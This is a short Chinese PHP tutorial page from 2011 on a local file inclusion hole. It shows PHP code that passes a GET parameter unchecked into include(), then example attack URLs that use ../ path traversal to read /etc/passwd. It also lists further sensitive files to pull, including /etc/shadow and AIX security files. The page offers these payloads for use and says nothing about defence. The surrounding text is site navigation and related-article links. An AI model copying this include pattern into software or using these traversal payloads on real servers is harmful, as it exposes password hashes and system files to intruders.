编程 PHP

php 伪造本地文件包含漏洞的代码

Posted in PHP onNovember 03, 2011

代码:

<?php 
$page=$_GET['page']; 
include($page.'php'); 
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

php 伪造本地文件包含漏洞的代码

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

动态网站web开发 PHP、ASP还是ASP.NET

Oct 09 PHP

一个取得文件扩展名的函数

Oct 09 PHP

30 个很棒的PHP开源CMS内容管理系统小结

Oct 14 PHP

iis下php mail函数的sendmail配置方法(官方推荐)

Apr 25 PHP

php常用Output和ptions/Info函数集介绍

Jun 19 PHP

PHP模块memcached使用指南

Dec 08 PHP

php中http与https跨域共享session的解决方法

Dec 20 PHP

php常量详细解析

Oct 27 PHP

ThinkPHP连接Oracle数据库

Apr 22 PHP

CI框架常用方法小结

May 17 PHP

浅谈Yii乐观锁的使用及原理

Jul 25 PHP

php利用array_search与array_column实现二维数组查找

Jul 08 PHP

有关php运算符的知识大全

Nov 03 #PHP

PHP读取txt文件的内容并赋值给数组的代码

Nov 03 #PHP

PHP支持多种格式图片上传(支持jpg、png、gif)

Nov 03 #PHP

PHP安全防范技巧分享

Nov 03 #PHP

防止本地用户用fsockopen DDOS攻击对策

Nov 02 #PHP

PHP隐形一句话后门，和ThinkPHP框架加密码程序(base64_decode)

Nov 02 #PHP

php数组函数序列之krsort()- 对数组的元素键名进行降序排序,保持索引关系

Nov 02 #PHP

逻辑函数(1) Dijkstra(1) Carbon(1) element-ui(1) 优先队列(1) 动态代理(1) 连接查询(1) 数据合并(1) pongo2(1) 模板引擎(1)

You might like

如何开始收听短波广播

2021/03/01 无线电

WINDOWS 2000下使用ISAPI方式安装PHP

2006/09/05 PHP

几种显示数据的方法的比较

2006/10/09 PHP

很让人受教的提高php代码质量36计

2012/09/05 PHP

php中url函数介绍及使用示例

2014/02/13 PHP

php+mysql查询实现无限下级分类树输出示例

2016/10/03 PHP

使用laravel指定日志文件记录任意日志

2019/10/17 PHP

Mac系统下搭建Nginx+php-fpm实例讲解

2020/12/15 PHP

Alliance vs AM BO3 第二场2.13

2021/03/10 DOTA

jquery 问答知识整理

2010/02/11 Javascript

JavaScript获取图片的原始尺寸以宽度为例

2014/05/04 Javascript

从零学JSON之JSON数据结构

2014/05/19 Javascript

基于BootStrap的前端分页带省略号和上下页效果

2017/05/18 Javascript

javascript实现遮罩层动态效果实例

2019/05/14 Javascript

webpack + vue 打包生成公共配置文件（域名）方便动态修改

2019/08/29 Javascript

jQuery实现的图片点击放大缩小功能案例

2020/01/02 jQuery

vue+AI智能机器人回复功能实现

2020/07/16 Javascript

用vite搭建vue3应用的实现方法

2021/02/22 Vue.js

浅析Python中的序列化存储的方法

2015/04/28 Python

python3实现UDP协议的服务器和客户端

2017/06/14 Python

Python简单计算数组元素平均值的方法示例

2017/12/26 Python

详解python websocket获取实时数据的几种常见链接方式

2019/07/01 Python

Python求平面内点到直线距离的实现

2020/01/19 Python

python 日志 logging模块详细解析

2020/03/31 Python

用python-webdriver实现自动填表的示例代码

2021/01/13 Python

KIKO美国官网：意大利的平价彩妆品牌

2017/05/16 全球购物

The Beach People美国：澳洲海滨奢华品牌

2018/07/05 全球购物

编写一个类体现构造，公有，私有方法，静态，私有变量

2013/08/10 面试题

中学生学习生活的自我评价

2013/10/26 职场文书

机械设计职业生涯规划书

2013/12/27 职场文书

《藤野先生》教学反思

2014/02/19 职场文书

倡议书格式

2014/04/14 职场文书

期中考试反思800字

2014/05/01 职场文书

2015年校务公开工作总结

2015/05/26 职场文书

法律意见书范文

2015/06/04 职场文书

Python实现将多张图片合成MP4视频并加入背景音乐

2022/04/28 Python